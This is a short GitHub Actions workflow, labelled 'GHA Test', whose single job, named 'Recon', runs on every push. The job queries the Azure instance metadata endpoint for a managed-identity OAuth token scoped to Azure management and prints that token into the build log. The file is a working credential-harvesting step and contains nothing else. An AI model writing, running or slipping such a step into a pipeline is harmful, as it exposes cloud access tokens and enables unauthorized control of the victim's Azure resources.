name: GHA Test
on: [push]
jobs: 
  Recon: #Each job can run for 6h max
    runs-on: ubuntu-latest
    steps:
      - run: |     
            curl -H Metadata:true --noproxy "*" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/" | jq


            
       
